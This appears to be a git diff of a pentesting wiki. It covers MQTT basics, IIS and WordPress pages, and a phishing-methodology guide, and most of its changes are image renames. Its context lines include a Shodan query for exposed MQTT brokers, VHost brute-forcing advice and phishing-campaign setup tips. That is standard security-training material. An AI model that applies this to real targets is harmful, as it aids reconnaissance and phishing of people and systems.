[https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b) + +### The Publish/Subscribe Pattern + +The publish/subscribe model is composed of: + +* **Publisher**: publishes a message to one (or many) topic(s) in the broker. +* **Subscriber**: subscribes to one (or many) topic(s) in the broker and receives all the messages sent from the publisher. +* **Broker**: routes all the messages from the publishers to the subscribers. +* **Topic**: consists of one or more levels that are separated by a a forward slash (e.g., /smartshouse/livingroom/temperature). + +![](https://miro.medium.com/max/1073/1\*sIxvchdgHSqAGebJjFHBAg.png) + +### Packet Format + +Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header + +![](https://miro.medium.com/max/838/1\*k6RkAHEk0576geQGUcKSTA.png) + +The first field of the fixed header represents the type of the MQTT Packet. All packet types are listed in table 01.Table 01: MQTT Packet Types + +![](https://miro.medium.com/max/1469/1\*z0fhdUVzGa0PLikH\_cyBmQ.png) + +## Shodan + +* `port:1883 MQTT` diff --git a/pentesting/pentesting-web/iis-internet-information-services.md b/pentesting/pentesting-web/iis-internet-information-services.md index 426de1636..363c03db3 100644 --- a/pentesting/pentesting-web/iis-internet-information-services.md +++ b/pentesting/pentesting-web/iis-internet-information-services.md @@ -320,7 +320,7 @@ C:\xampp\tomcat\conf\server.xml If you see an error like the following one: -![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1).png>) +![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (2).png>) It means that the server **didn't receive the correct domain name** inside the Host header.\ In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one. diff --git a/pentesting/pentesting-web/wordpress.md b/pentesting/pentesting-web/wordpress.md index d333fc1d0..abaff278e 100644 --- a/pentesting/pentesting-web/wordpress.md +++ b/pentesting/pentesting-web/wordpress.md @@ -187,7 +187,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t ``` -![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1) (1).png>) +![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1).png>) ![](<../../.gitbook/assets/image (102).png>) diff --git a/phishing-methodology/README.md b/phishing-methodology/README.md index 33a619fb9..0bd3f87d7 100644 --- a/phishing-methodology/README.md +++ b/phishing-methodology/README.md @@ -3,14 +3,13 @@ {% hint style="warning" %} **Support HackTricks and get benefits!** -Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? -Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} @@ -340,7 +339,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke * Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._ * You can leave blank the username and password, but make sure to check the Ignore Certificate Errors -![](<../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (2) (1) (1) (4).png>) +![](<../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (2) (7).png>) {% hint style="info" %} It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\